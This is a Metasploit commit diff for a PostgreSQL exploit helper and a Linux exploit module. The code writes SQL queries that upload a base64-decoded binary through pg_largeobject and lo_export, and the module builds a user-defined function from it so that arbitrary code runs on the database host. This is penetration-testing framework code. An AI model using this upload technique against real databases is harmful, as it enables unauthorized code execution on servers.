Go back to old behavior for unknown versions

May not be correct, but it's what we used to do, so probably better than
just raising.

Also documents things a bit better.

Author: egypt

lib/msf/core/exploit/postgres.rb

@@ -325,20 +325,20 @@ def postgres_upload_binary_data(data, remote_fname=nil)
 	end
 
 	# Writes b64 data from a table field, decoded, to disk.
+	#
+	# This is accomplished with 3 sql queries:
+	# 1. select lo_create
+	# 2. version dependant:
+	#    - on 9.x, insert into pg_largeobject
+	#    - on older versions, update pg_largeobject
+	# 3. select lo_export to write the file to disk
+	#
 	def postgres_write_data_to_disk(tbl,fld,remote_fname=nil)
 		oid = rand(60000) + 1000
 		remote_fname ||= Rex::Text::rand_text_alpha(8) + ".dll"
 
 		ver = postgres_fingerprint
 		case ver[:auth]
-		when /PostgreSQL 8\./
-			# 8.x inserts the largeobject into the table when you do the
-			# lo_create, so we with a value.
-			queries = [
-				"select lo_create(#{oid})",
-				"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
-				"select lo_export(#{oid}, '#{remote_fname}')"
-			]
 		when /PostgreSQL 9\./
 			# 9.x does *not* insert the largeobject into the table when you do
 			# the lo_create, so we must insert it ourselves.
@@ -348,10 +348,17 @@ def postgres_write_data_to_disk(tbl,fld,remote_fname=nil)
 				"select lo_export(#{oid}, '#{remote_fname}')"
 			]
 		else
-			# Since the technique required for uploading seems to change
-			# between versions, complain that we don't know how to do it for
-			# an unknown version.
-			raise RuntimeError.new("Unknown Postgres version, don't know how to upload files")
+			# 8.x inserts the largeobject into the table when you do the
+			# lo_create, so we with a value.
+			#
+			# 7.x is an unknown, but this behavior was the default before the
+			# addition of support for 9.x above, so try it this way and hope
+			# for the best
+			queries = [
+				"select lo_create(#{oid})",
+				"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
+				"select lo_export(#{oid}, '#{remote_fname}')"
+			]
 		end
 
 		queries.each do |q|

modules/exploits/linux/postgres/postgres_payload.rb

@@ -24,16 +24,17 @@ def initialize(info = {})
 		super(update_info(info,
 			'Name'           => 'PostgreSQL for Linux Payload Execution',
 			'Description'    => %q{
-				This module creates and enables a custom UDF (user defined function) on the
-				target host via the UPDATE pg_largeobject method of binary injection. On
-				default Microsoft Linux installations of PostgreSQL (=< 8.4), the postgres
-				service account may write to the Windows temp directory, and may source
-				UDF Shared Libraries's from there as well.
-
-				PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on are valid targets for this module.
-
-				NOTE: This module will leave a payload executable on the target system when the
-				attack is finished, as well as the UDF SO and the OID.
+				On some default Linux installations of PostgreSQL, the
+				postgres service account may write to the /tmp directory, and
+				may source UDF Shared Libraries's from there as well, allowing
+				execution of arbitrary code.
+
+				This module compiles a Linux shared object file, uploads it to
+				the target host via the UPDATE pg_largeobject method of binary
+				injection, and creates a UDF (user defined function) from that
+				shared object. Because the payload is run as the shared object's
+				constructor, it does not need to conform to specific Postgres
+				API versions.
 			},
 			'Author'         =>
 			[